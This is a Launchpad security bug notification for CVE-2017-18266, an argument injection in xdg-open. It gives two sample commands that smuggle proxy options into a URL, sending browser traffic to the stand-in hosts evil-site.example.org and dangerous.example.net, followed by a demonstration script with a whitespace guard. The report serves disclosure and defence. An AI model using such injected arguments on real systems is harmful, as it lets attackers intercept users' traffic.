*** This bug is a security vulnerability ***

Public security bug reported:

An attacker can silently set their proxy in browser settings to capture
the user's traffic, using a malformed URL in xdg-open.

The following command tries to open the Yandex main page through a
third-party proxy server.

    env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-proxy evil-site.example.org:8080'

Another sample exploit, with the Chromium browser.

    env -i BROWSER="chromium %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.net/proxy.pac"
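The two samples above work because a BROWSER template containing `%s` is filled with the URL and the result is then word-split by the shell, so the space inside the "URL" turns the rest of it into separate browser arguments. The script below is an added demonstration, not xdg-utils code and not part of the report: it models the unsafe expansion (counting the argv words the browser would receive, without launching anything) beside a guard that refuses any URL that does not survive word-splitting as a single argument. The function names and the benign sample URL are constructed; the injected URL is the one from the report.

```sh
#!/bin/sh
# Added demonstration (not xdg-utils code): why a BROWSER template such as
# "links %s" lets whitespace in a URL become extra browser arguments, and a
# check that refuses such URLs. Function names and sample inputs are constructed.

# Disable pathname expansion so a '?' or '*' in a URL can never glob into
# file names during the unquoted expansions below.
set -f

# UNSAFE: fill the template with printf and let the shell word-split the
# result, the way an unquoted expansion does. Prints how many argv words the
# browser would receive; anything above 2 means injected arguments.
unsafe_argc() {
    template=$1
    url=$2
    # shellcheck disable=SC2046,SC2059
    set -- $(printf "$template" "$url")
    echo "$#"
}

# Check: is the URL a single shell word? Word-split it on IFS and count.
# A genuine URL never contains unescaped whitespace, so rejecting these
# loses no legitimate input.
url_is_single_word() {
    # shellcheck disable=SC2086
    set -- $1
    [ "$#" -eq 1 ]
}

# SAFE: expand the template only after the single-word check passes.
# Prints the resulting argv one word per line; on rejection prints
# "rejected" and returns non-zero so the caller can fall back or abort.
safe_argv() {
    template=$1
    url=$2
    if ! url_is_single_word "$url"; then
        echo "rejected"
        return 1
    fi
    # shellcheck disable=SC2046,SC2059
    set -- $(printf "$template" "$url")
    printf '%s\n' "$@"
}

# Constructed inputs: the injected URL from the report and a benign one.
tmpl='links %s'
bad='http://www.yandex.com/ -http-proxy evil-site.example.org:8080'
good='http://www.yandex.com/?text=a+b'

echo "unsafe expansion of injected URL yields $(unsafe_argc "$tmpl" "$bad") argv words"
safe_argv "$tmpl" "$bad" || echo "injected URL blocked"
safe_argv "$tmpl" "$good"
```

Run it with `sh` to see the injected URL expand to four words under the unsafe path and get rejected under the guarded one, while the benign URL passes through as exactly two arguments. The guard is deliberately coarse (any IFS whitespace is grounds for rejection) because that is the property the template mechanism actually depends on; a stricter URL parser would add little here.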

** Affects: xdg-utils
     Importance: Unknown
         Status: Unknown

** Affects: xdg-utils (Ubuntu)
     Importance: Undecided
     Assignee: Nicholas Guriev (mymedia)
         Status: New

** Changed in: xdg-utils (Ubuntu)
     Assignee: (unassigned) => Nicholas Guriev (mymedia)

** Information type changed from Private Security to Public Security

** Bug watch added: freedesktop.org Bugzilla #103807
   https://bugs.freedesktop.org/show_bug.cgi?id=103807

** Also affects: xdg-utils via
   https://bugs.freedesktop.org/show_bug.cgi?id=103807
   Importance: Unknown
       Status: Unknown

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18266

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1772295

Title:
  CVE-2017-18266: argument injection in xdg-open

To manage notifications about this bug go to:
https://bugs.launchpad.net/xdg-utils/+bug/1772295/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
